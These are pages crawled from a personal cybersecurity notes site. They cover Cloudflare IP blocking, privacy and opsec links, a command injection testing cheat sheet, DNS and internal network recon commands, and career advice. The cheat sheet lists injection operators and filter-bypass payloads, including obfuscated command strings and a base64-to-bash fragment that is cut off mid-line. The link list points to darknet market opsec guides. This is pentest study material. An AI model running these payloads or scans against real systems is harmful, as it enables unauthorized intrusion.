2604:a880:800:10::c55:5000/124 2604:a880:800:10::c56:b000/124 2a03:b0c0:2:d0::153e:a000/124 2a03:b0c0:2:d0::1576:8000/124 2a03:b0c0:2:d0::1577:7000/124 2a03:b0c0:2:d0::1579:e000/124 2a03:b0c0:2:d0::157c:a000/124 Copy 35.203.210.0/23 147.185.132.0/23 162.216.149.0/24 162.216.150.0/24 198.235.24.0/24 205.210.31.0/24 216.25.88.0/21 Copy (ip.src.country in {"CN" "KP" "IR" "SO" "IQ" "CU" "SY" "LY" "VE" "SC" "DE" "NL" "LT" "BG" "ID" "KZ" "BD" "RO" "CL" "PE" "LV" "GI" "TR" "MD" "EE" "UZ" "KG" "MN" "BO" "EG" "ZA" "XX"} or ip.src.continent eq "T1") and not (ip.src in $geo_whitelist) Copy import csv # Replace the below IPs with your multiline IP list raw_ips = """ 8.8.8.8 9.9.9.9 """ # Clean up list ip_list = raw_ips.strip().splitlines() ip_list = [ip.strip() for ip in ip_list if ip.strip() and not ip.startswith("#")] # Remove duplicates and sort unique_ips = sorted(set(ip_list)) # Description default_description = "Uploaded via bulk upload script" # Write to CSV with open('cloudflare_ips.csv', mode='w', newline='') as csvfile: writer = csv.writer(csvfile) writer.writerow(['ip', 'description']) # Cloudflare format for ip in unique_ips: writer.writerow([ip, default_description]) print("Saved to cloudflare_ips.csv") --- # Privacy and Opsec Resources | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/opsec.md) . [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#privacy) Privacy ----------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fdigital-defense.io%2Ffavicon.png&width=20&dpr=3&quality=100&sign=9de2e8f6&sv=2)Digital Defense - The ultimate personal security checklist to secure your digital lifedigital-defense.io](https://digital-defense.io/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - lissy93/awesome-privacy: 🦄 A curated list of privacy & security-focused software and servicesGitHub](https://github.com/lissy93/awesome-privacy) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - zbetcheckin/Security\_list: Great security list for fun and profitGitHub](https://github.com/zbetcheckin/Security_list) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.privacytools.io%2Fimg%2Ffavicons%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=49f44e9f&sv=2)Best Privacy Tools & Software Guide in in 2026privacytoolsIO](https://www.privacytools.io/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fkycnot.me%2Fapple-touch-icon-180x180.png&width=20&dpr=3&quality=100&sign=dc3a389e&sv=2)No-KYC Services Directory - Reviews & Privacy Scores | KYCnot.meKYCnot.me](https://kycnot.me/) [https://www.privacyguides.org/](https://www.privacyguides.org/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#the-opsec-bible) The OpSec Bible --------------------------------------------------------------------------------------------------- [http://opbible7nans45sg33cbyeiwqmlp5fu7lklu6jd6f3mivrjeqadco5yd.onion/opbible7nans45sg33cbyeiwqmlp5fu7lklu6jd6f3mivrjeqadco5yd.onion](http://opbible7nans45sg33cbyeiwqmlp5fu7lklu6jd6f3mivrjeqadco5yd.onion/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#darknet-market-bible) DarkNet Market Bible: -------------------------------------------------------------------------------------------------------------- [http://biblemeowimkh3utujmhm6oh2oeb3ubjw2lpgeq3lahrfr2l6ev6zgyd.onion/biblemeowimkh3utujmhm6oh2oeb3ubjw2lpgeq3lahrfr2l6ev6zgyd.onion](http://biblemeowimkh3utujmhm6oh2oeb3ubjw2lpgeq3lahrfr2l6ev6zgyd.onion/) DNM Bible Clearnet Mirror: [https://0xbitx.github.io/DARKNET-OPSEC/](https://0xbitx.github.io/DARKNET-OPSEC/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#software-marketplaces) Software Marketplaces: ---------------------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fdigitalgoods.proxysto.re%2Fstatic%2Ffavicon-96.png&width=20&dpr=3&quality=100&sign=b976641f&sv=2)Digital Goods by ProxyStoredigitalgoods.proxysto.re](https://digitalgoods.proxysto.re/en) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#anonymous-email-forwarding) Anonymous Email Forwarding: -------------------------------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Faddy.io%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=4f451689&sv=2)Free, Open-source Anonymous Email Forwarding | addy.ioaddy\_io](https://addy.io/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fsimplelogin.io%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=2d30550e&sv=2)SimpleLogin | Open source anonymous email serviceSimpleLogin](https://simplelogin.io/) ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#self-hosting) Self-Hosting: [https://awesome-selfhosted.net/](https://awesome-selfhosted.net/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec#vps-and-hosting) VPS and Hosting --------------------------------------------------------------------------------------------------- [https://kycnot.me/?categories=hosting¤cy-mode=and¤cies=xmr](https://kycnot.me/?categories=hosting¤cy-mode=and¤cies=xmr) VPS and cloud-service/hosting providers that are either (a) Tor-friendly or (b) accept Monero Dread Link: dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad\[.\]onion/post/cedc0f1054d73128e8e2 1. [https://trilightzone.org](https://www.trilightzone.org/) \[privacy-based\] 2. [https://xmrvps.com](https://t.co/MSOI8l2H2w) \[privacy-based\] 3. [https://ablative.hosting](https://t.co/yyXZt6UeYE) \[privacy-based\] 4. [https://ablative.hosting/shared-single-hop-onion-hosting…](https://t.co/tDpMubr0Xo) \[privacy-based\] 5. [https://anycolo.net](https://t.co/td6WlpgWmh) 6. [https://flokinet.is](https://t.co/GpHFiRvqtj) \[privacy-based\] 7. [https://swisslayer.com](https://t.co/Zn1IIEpUU0) \[privacy-based\] 8. [https://koddos.net](https://t.co/7JzsSOVHZ1) 9. [https://privex.io](https://t.co/JmMh48PRI8) \[privacy-based\] 10. [https://epio.host](https://t.co/cS24D3mIJu) \[privacy-based\] 11. [https://incognet.io](https://t.co/ZcRc3M71ve) \[privacy-based\] 12. [https://5wire.co.uk](https://t.co/K1aRIdunh9) 13. [https://userbase.com](https://t.co/XYr64iUPml) 14. [https://nicevps.net](https://t.co/ANIpjxVb9J) 15. [https://cryptoho.st](https://t.co/ETKohkH3DO) \[privacy-based\] 16. [https://cryptwerk.com](https://t.co/I8k7CSCOvw) 17. [https://host-world.com/monero-vps](https://t.co/P5BK5wfIqa) \[privacy-based\] 18. [https://abacohosting.com](https://t.co/XgER8ar0CA) 19. [https://evolution-host.com](https://t.co/h4bQVsETdZ) 20. [https://qhoster.com](https://t.co/z8XOnpnI4z) 21. [https://whattheserver.com](https://t.co/Q1hEQtsGjv) 22. [https://codify.global](https://t.co/ySyvCMfrNP) 23. [https://superbytehosting.com](https://t.co/99pbi697T4) 24. [https://superbithost.com](https://t.co/WLpgIo5OF6) \[privacy-based\] 25. [https://nexwave.ca](https://t.co/xIu9h2pok1) 26. [https://hostingssi.com](https://t.co/2WZzCEPyb8) 27. [https://blazinhosting.net](https://t.co/QIi8JNJLDS) 28. [https://web.laweitech.com](https://t.co/XZqzxxVz3U) 29. [https://trilightzone.org](https://t.co/CZmXsqBmOX) \[privacy-based\] 30. [https://nicevps.net](https://t.co/ANIpjxVb9J) 31. [https://1984hosting.com](https://t.co/Hi7ySKocrB) 32. [https://snel.com](https://t.co/Jedp21I6gz) 33. [https://njal.la](https://t.co/YcwrtYzOue) 34. [https://bacloud.com](https://t.co/SQfWMcbEdx) 35. [https://cryptofibers.com](https://t.co/42CQOxl0CV) \[privacy-based\] 36. [https://sporestack.com](https://t.co/Apl3dCmesx) 37. [https://99stack.com](https://t.co/WU2MnwBFvr) \[privacy-based\] 38. [https://radwebhosting.com](https://t.co/iB7k571IDv) 39. [https://packetpoint.ca](https://t.co/TqfbiiQ7d3) 40. [https://serverwhere.com](https://t.co/HK8K8Rg8nf) 41. [https://hosthavoc.com](https://t.co/DlJ4taAx8a) 42. [https://abacohosting.com](https://t.co/XgER8ar0CA) 43. [https://coinhost.io](https://t.co/TiR7bAgwmS) 44. [https://bacloud.com](https://t.co/SQfWMcbEdx) 45. [https://superbytehosting.com](https://t.co/99pbi697T4) 46. [https://bitvps.com](https://t.co/phORqBm8CG) \[privacy-based\] 47. [https://1gbits.com](https://t.co/LHypSyzi2I) 48. [https://bithost.io](https://t.co/a7ndKeHvS5) \[privacy-based\] 49. [https://airvpn.org](https://t.co/5Ay4xX59LI) 50. [https://builderra.com](https://t.co/4nxsSI2gn4) 51. [https://impreza.host/services/tor-hosting/…](https://t.co/IEKpXNfPXR) \[privacy-based\] 52. [https://ipxcore.com](https://t.co/HksOPbSkUU) \[privacy-based\] 53. [https://orangewebsite.com](https://t.co/zG3PfNYj9L) \[privacy-based\] 54. [https://coin.host](https://t.co/XWYC5Oec6a) \[privacy-based\] [PreviousPublic DNS Services](https://martian1337.gitbook.io/notes/digital-privacy/dns-services) [NextMartian's Stack](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack) Last updated 2 months ago * [Privacy](https://martian1337.gitbook.io/notes/digital-privacy/opsec#privacy) * [The OpSec Bible](https://martian1337.gitbook.io/notes/digital-privacy/opsec#the-opsec-bible) * [DarkNet Market Bible:](https://martian1337.gitbook.io/notes/digital-privacy/opsec#darknet-market-bible) * [Software Marketplaces:](https://martian1337.gitbook.io/notes/digital-privacy/opsec#software-marketplaces) * [Anonymous Email Forwarding:](https://martian1337.gitbook.io/notes/digital-privacy/opsec#anonymous-email-forwarding) * [Self-Hosting:](https://martian1337.gitbook.io/notes/digital-privacy/opsec#self-hosting) * [VPS and Hosting](https://martian1337.gitbook.io/notes/digital-privacy/opsec#vps-and-hosting) --- # Governance, Risk, Compliance | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance.md) . [Vulnerability Management Lifecycle](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle) [PreviousWireShark filters](https://martian1337.gitbook.io/notes/notes/defensive-security/wireshark-filters) [NextVulnerability Management Lifecycle](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle) Last updated 1 year ago --- # CSSLP | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/certifications/csslp.md) . [Domain 1: Secure Software Concepts](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-1-secure-software-concepts) [Domain 2: Secure Software Lifecycle Management](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-2-secure-software-lifecycle-management) [Domain 3: Secure Software Requirements](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-3-secure-software-requirements) [Domain 4: Secure Software Architecture and Design](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-4-secure-software-architecture-and-design) [Domain 5: Secure Software Implementation](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation) [Domain 6: Secure Software Testing](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-6-secure-software-testing) [Domain 7: Secure Software Deployment, Operations, Maintenance](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance) [Domain 8: Secure Software Supply Chain](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain) [PreviousCertifications](https://martian1337.gitbook.io/notes/notes/certifications) [NextDomain 1: Secure Software Concepts](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-1-secure-software-concepts) Last updated 1 year ago --- # Common System Task Info | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/common-system-task-info.md) . [IT Tasks](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks) [Linux Basics](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs) [PowerShell](https://martian1337.gitbook.io/notes/notes/common-system-task-info/powershell) [PreviousReporting](https://martian1337.gitbook.io/notes/notes/reporting) [NextIT Tasks](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-it-tasks) --- # Command Injection Testing | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing.md) . Parameter Objective `-h` or `/?` What is the system output from using help menu commands? `;`, `; echo whoami` Unix only; run echo after initial command `|`, `echo whoami|` Perl-specific injection to open files `||`, `|| echo whoami` Run command if the initial command returns non-zero as the exit status `&` , `& echo whoami` Run initial command as background task and run next task immediately `&&` , `&& echo whoami` Run if the initial command returns zero as the exit status `$(whoami)` Unix-only; Bash command execution `` `whoami` `` Unix only; using generic process substitution `>(whoami)` Unix only; using process substitution [](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing#identifying-blacklisted-characters) Identifying Blacklisted Characters ---------------------------------------------------------------------------------------------------------------------------------------------------------- Check in Burp with each Command Injection operators. #### [](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing#bypassing-space-filters) Bypassing Space Filters Copy # Add TAB %09 # Add SPACE ${IFS} # Add Brace Expresions {ls,-al} #### [](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing#bypassing-other-blacklisted-characters-linux) Bypassing Other Blacklisted Characters (Linux) #### [](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing#bypassing-other-blacklisted-characters-windows) Bypassing Other Blacklisted Characters (Windows) #### [](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing#bypassing-blacklisted-commands-linux) Bypassing Blacklisted Commands (Linux) [PreviousWeb Tools](https://martian1337.gitbook.io/notes/notes/appsec/tools) [NextJWTs and JSON](https://martian1337.gitbook.io/notes/notes/appsec/json) Last updated 1 year ago Copy # Add / ${PATH:0:1} # Add ; ${LS_COLORS:10:1} # Character Shifting man ascii (Find \) = 92 $(tr '!-}' '"-~'<<<[)\ \ Copy\ \ # Add \\ %HOMEPATH:~6,-11%\ $env:HOMEPATH[0]\ \ Copy\ \ w'h'o'am'i\ w"h"o"am"i\ who$@ami\ w\ho\am\i\ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")\ $(a="WhOaMi";printf %s "${a,,}")\ $(rev<<<'imaohw')\ bash<<<$(base64 -d<<` Identify the `A` record for the target domain. `dig a $TARGET @` Identify the `A` record for the target domain. `nslookup -query=PTR ` Identify the `PTR` record for the target IP address. `dig -x @` Identify the `PTR` record for the target IP address. `nslookup -query=ANY $TARGET` Identify `ANY` records for the target domain. `dig any $TARGET @` Identify `ANY` records for the target domain. `nslookup -query=TXT $TARGET` Identify the `TXT` records for the target domain. `dig txt $TARGET @` Identify the `TXT` records for the target domain. `nslookup -query=MX $TARGET` Identify the `MX` records for the target domain. `dig mx $TARGET @` Identify the `MX` records for the target domain. [PreviousPorts and associated Vectors](https://martian1337.gitbook.io/notes/notes/appsec/ports-and-associated-vectors) [NextWeb Tools](https://martian1337.gitbook.io/notes/notes/appsec/tools) Last updated 1 year ago --- # Cybersecurity Roadmaps | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps.md) . [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps#foundational-topics-of-study) Foundational Topics of Study --------------------------------------------------------------------------------------------------------------------------------------------------------- * **Networking protocols** * OSI and TCP/IP Model * IP addressing and subnetting * Basics of switching and routing * Networking protocols * **Operating Systems and Security** * Windows Security policies and features * Linux security mechanisms * Permissions (User, group, etc.) * Secure boot and File Integrity monitoring * Host-based Firewalls * Antivirus and endpoint security * **Cryptography and Encryption** * Symmetric Encryption * Asymmetric Encryption * Hash functions/algorithms * Digital signatures, Certificates and Public Key Infrastructure * **Cyber Threats and Attacks** * Malware Types (Ransomware, Trojans, Worms, Viruses) * Social Engineering Attacks (Phishing, smishing, etc.) * Denial of Service (DoS) and Distributed DoS ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps#intermediate-topics-of-study) Intermediate Topics of Study * **Network Security** * Firewalls, configuration and management * Virtual Private Networks (VPNs) * Network Access Control (NAC) * Web Application Security * OWASP Top 10, CWE/SANS Top 25 * Input validation and encoding * Secure Session Management * **System Hardening and Best Practices** * Server Hardening Techniques * Patch Management * Configuration Management * Principle of least privilege (PoLP) * **Digital Forensics and Incident Response (DFIR)** * Incident Handling and Response processes * Evidence Collection and Preservation * Chain of Custody and other Legal considerations * Forensic Tools and Techniques ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps#specialized-topics-of-study) Specialized Topics of Study * **Ethical Hacking and Penetration Testing** * Methodologies (OSSTMM, PTES) * Recon and Footprinting * Exploitation Techniques * Reporting * **Cloud Security** * Security challenges of cloud computing * How to protect cloud-based data and applications * Cloud security best practices * **DevSecOps** * Relatively new field that focuses on integrating security into the software development lifecycle * Helps to ensure that security is built into software from the start, rather than being an afterthought * **Machine Learning and Artificial Intelligence for Cybersecurity** * Cutting-edge field that is rapidly changing the way that cybersecurity is conducted * Helps to stay ahead of the curve and protect organizations from the latest threats * **Security Leadership** * If you aspire to a leadership role in cybersecurity, it is important to develop your skills in security leadership * Includes topics such as strategic planning for cybersecurity, managing security teams, communicating security risks to management and stakeholders, building a security culture within an organization * **Security Awareness and Training** * This is important for all employees, regardless of their role in the organization. Security awareness training can help employees to understand the risks of cyberattacks and to take steps to protect themselves and their organization. * **Security Compliance** * Many organizations are required to comply with specific security regulations, such as the General Data Protection Regulation (GDPR) and the Payment Card Industry Data Security Standard (PCI DSS). By understanding the security regulations that apply to your organization, you can help to ensure compliance and protect your organization from legal liability. * **Security Research** * This is a great way to stay ahead of the curve and learn about the latest threats and trends in cybersecurity. There are many different security research organizations and conferences that you can follow to learn about the latest research. * **Security Career Development** * As you progress in your cybersecurity career, it is important to continue to develop your skills and knowledge. There are many different ways to do this, such as taking courses, attending conferences, and getting certified. * **Incident Response and Forensics** * This is a critical topic for any cybersecurity professional. Incident response is the process of responding to and recovering from a cyberattack. Forensics is the process of collecting and analyzing evidence from a cyberattack. * **Software Security** * This is a growing field as more and more organizations move their applications to the cloud. Software security is the practice of designing, developing, and deploying software in a way that minimizes the risk of cyberattacks. * **Threat Modeling** * This is a process of identifying and assessing the threats to an organization's systems and data. Threat modeling can help organizations to prioritize their security efforts and to develop effective security controls. [PreviousGuides](https://martian1337.gitbook.io/notes/training-and-career/guides) [NextCybersecurity Training Topics](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics) Last updated 1 year ago * [Foundational Topics of Study](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps#foundational-topics-of-study) * [Intermediate Topics of Study](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps#intermediate-topics-of-study) * [Specialized Topics of Study](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-roadmaps#specialized-topics-of-study) --- # Internal Active Recon | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon.md) . ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#this-guide-is-intended-for-internal-corporate-usage-in-controlled-environments-and-is-noisy-on-the-n) This guide is intended for internal corporate usage in controlled environments and is noisy on the network. The below code snippets are examples to demonstrate the methodology and remaining organized with the same working directory. ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#prerequisites) Prerequisites * Obtain explicit written authorization before scanning any external or internal assets. * Define scope: which domains, IP ranges, and network segments to include or exclude. * Understand and document business criticality of assets. * Ensure VPN or internal network access as needed. * Prepare and organize target lists (domains, IPs) in text files. * Set up a dedicated scanning host with appropriate privileges and resources. * Install necessary tools: * Subdomain enumerators: `findomain`, `sublist3r`, `amass` (with API keys for VirusTotal, Shodan if needed) * Scanners: `masscan`, `nmap` * Vulnerability scanners: `nuclei`, `openvas`, `nessus` * HTTP validation and fingerprinting: `httpx`, `dismap`, `eyewitness` * Internal domain enumeration and attack path mapping: `bloodhound`, `crackmapexec` * * * ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#directory-and-workspace-setup) Directory & Workspace Setup 1. Create a structured workspace on your scanning host before starting scans: * `outputs/`: General aggregated outputs and reports. * `subdomains/`: Raw and processed subdomain enumeration results. * `nmap/`: Detailed service scans. * `masscan/`: Large-scale port scan files. * `vulnerabilities/`: Vulnerability scan reports. * `screenshots/`: Browser screenshots captured during reconnaissance. * `bloodhound/`: Internal domain enumeration and attack path data. **Documentation:** This setup supports organized storage of outputs for easy auditing and retrieval. * * * ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#attack-surface-assessment-workflow) Attack Surface Assessment Workflow ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-1.-subdomain-and-asset-enumeration) 1\. Subdomain & Asset Enumeration _Aggregate subdomains from multiple sources into a single unique list._ * [Findomain GitHub & Blog](https://github.com/Findomain/Findomain) , [https://findomain.app/the-real-power-of-findomain/](https://findomain.app/the-real-power-of-findomain/) * [Sublist3r GitHub](https://github.com/aboul3la/Sublist3r) * [Amass GitHub](https://github.com/OWASP/Amass) ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-2.-validate-and-resolve-assets) 2\. Validate & Resolve Assets _Validate HTTP/S live hosts and DNS resolution._ * [Httpx GitHub](https://github.com/projectdiscovery/httpx) ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-3.-port-and-service-discovery) 3\. Port & Service Discovery _Quick port scan with Masscan and detailed service enumeration with Nmap._ * [Masscan GitHub](https://github.com/robertdavidgraham/masscan) * [Nmap Official](https://nmap.org/book/man-briefoptions.html) ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-4.-vulnerability-assessment) 4\. Vulnerability Assessment _Run fast template-based and deep vulnerability scans._ * [Nuclei Docs](https://nuclei.projectdiscovery.io/templating-guide/) * [OpenVAS Wiki](https://www.greenbone.net/en/community-edition/) * [Nessus Docs](https://docs.tenable.com/nessus/) ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-5.-internal-network-mapping-if-authorized) 5\. Internal Network Mapping (if authorized) _Internal host discovery and service enumeration, plus AD attack path analysis._ * [BloodHound Docs](https://bloodhound.readthedocs.io/en/latest/) * [CrackMapExec GitHub](https://github.com/byt3bl33d3r/CrackMapExec) ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-6.-web-technology-and-screenshotting) 6\. Web Technology & Screenshotting _Fingerprint web tech stacks and gather screenshots._ * [Dismap GitHub](https://github.com/m4ll0k/Dismap) * [Eyewitness GitHub](https://github.com/FortyNorthSecurity/EyeWitness) * * * ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#post-assessment-file-structure-and-organization) Post-Assessment: File Structure & Organization Example directory structure and contents after assessment: * * * ### [](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#notes-and-best-practices) Notes and Best Practices * Chain outputs between stages for automation and maximum coverage. * Use `sort -u` often to avoid duplications. * Keep directory structure consistent and filenames clear. * Only scan within authorized scope. * Schedule scans to minimize disruption. [PreviousRecon + OSINT](https://martian1337.gitbook.io/notes/resources/recon-+-osint) [NextOffensive](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity) Last updated 9 months ago * [Prerequisites](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#prerequisites) * [Directory & Workspace Setup](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#directory-and-workspace-setup) * [Attack Surface Assessment Workflow](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#attack-surface-assessment-workflow) * [1\. Subdomain & Asset Enumeration](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-1.-subdomain-and-asset-enumeration) * [2\. Validate & Resolve Assets](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-2.-validate-and-resolve-assets) * [3\. Port & Service Discovery](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-3.-port-and-service-discovery) * [4\. Vulnerability Assessment](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-4.-vulnerability-assessment) * [5\. Internal Network Mapping (if authorized)](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-5.-internal-network-mapping-if-authorized) * [6\. Web Technology & Screenshotting](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#id-6.-web-technology-and-screenshotting) * [Post-Assessment: File Structure & Organization](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#post-assessment-file-structure-and-organization) * [Notes and Best Practices](https://martian1337.gitbook.io/notes/resources/recon-+-osint/internal-active-recon#notes-and-best-practices) Copy mkdir -p ~/attack-surface-assessment/{outputs,subdomains,nmap,masscan,vulnerabilities,screenshots,bloodhound} cd ~/attack-surface-assessment Copy findomain -t example.com -o subdomains/findomain.txt && cat subdomains/findomain.txt > subdomains/all_subs.txt sublist3r -d example.com -o - | tee -a subdomains/all_subs.txt amass enum -d example.com -o - | tee -a subdomains/all_subs.txt sort -u subdomains/all_subs.txt -o subdomains/all_subs.txt Copy httpx -l subdomains/all_subs.txt -o outputs/live_hosts.txt Copy masscan -p1-65535 -iL outputs/live_hosts.txt --rate=10000 -oG masscan/masscan_results.gnmap awk '/Up$/{print $2}' masscan/masscan_results.gnmap > nmap/scan_targets.txt nmap -sS -sV -A -iL nmap/scan_targets.txt -oN nmap/nmap_services.txt Copy nuclei -l outputs/live_hosts.txt -o vulnerabilities/nuclei_web_results.txt openvas-cli --target-file nmap/scan_targets.txt --output vulnerabilities/openvas_report.html nessus -q -x -i nmap/scan_targets.txt -o vulnerabilities/nessus_report.nessus Copy nmap -sn 10.0.0.0/8 -oG nmap/internal_discovery.gnmap awk '/Up$/{print $2}' nmap/internal_discovery.gnmap > nmap/internal_live_hosts.txt nmap -sS -sV -A -iL nmap/internal_live_hosts.txt -oN nmap/internal_services.txt bloodhound-python -u admin -p 'Password123!' -d domain.local -gc-ip 10.0.0.1 -c all --json bloodhound/bloodhound_data.json crackmapexec smb 10.0.0.0/24 -u username -p password Copy dismap -i outputs/live_hosts.txt -o outputs/dismap_results.txt eyewitness --web -f outputs/live_hosts.txt -d screenshots/ Copy ~/attack-surface-assessment/ ├── outputs/ │ ├── live_hosts.txt │ ├── dismap_results.txt │ └── aggregated_report.pdf ├── subdomains/ │ ├── all_subs.txt │ ├── findomain.txt │ ├── sublist3r.txt │ └── amass.txt ├── nmap/ │ ├── internal_services.txt │ ├── nmap_services.txt │ ├── internal_live_hosts.txt │ └── scan_targets.txt ├── masscan/ │ └── masscan_results.gnmap ├── vulnerabilities/ │ ├── nuclei_web_results.txt │ ├── openvas_report.html │ └── nessus_report.nessus ├── screenshots/ │ └── (image files) └── bloodhound/ └── bloodhound_data.json --- # Keeping it Real for Beginners | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners.md) . [](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#stop-comparing) Stop Comparing ----------------------------------------------------------------------------------------------------------------------------- Everyone has their own journey in this space so comparing yourself to people who present that they are highly successful or highly skilled will run you crazy. Dont let this happen while half of the people publicized are not all they seem to be. Learn what skillsets are truly needed and walk your own path! [](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#be-consistent) Be consistent! ---------------------------------------------------------------------------------------------------------------------------- Consistency in this space is very important. The threat is just as dedicated and consistent as the defenders need to be nowadays. Stay motivated and ensure you are committing to the right cause or following the correct training. [](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#just-ask) Just Ask! ------------------------------------------------------------------------------------------------------------------ You will be surprised how much information you can receive just by asking someone or conducting an official informational interview. People who are truly well-versed and passionate about a topic will often love to talk about it to an aspiring learner. It is important to ask nowadays due to gathering expertise of the person speaking as well. Often people will speak up to more than what they are actually experienced in just to maintain relative conversation. This is where asking questions for your own understanding or just to gauge someone's skillset is very beneficial! [](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners#beware-of-the-modern-day-enthusisast-influencer-and-self-proclaimed-hacker) Beware of the modern-day "Enthusisast", "Influencer" and self-proclaimed "Hacker" 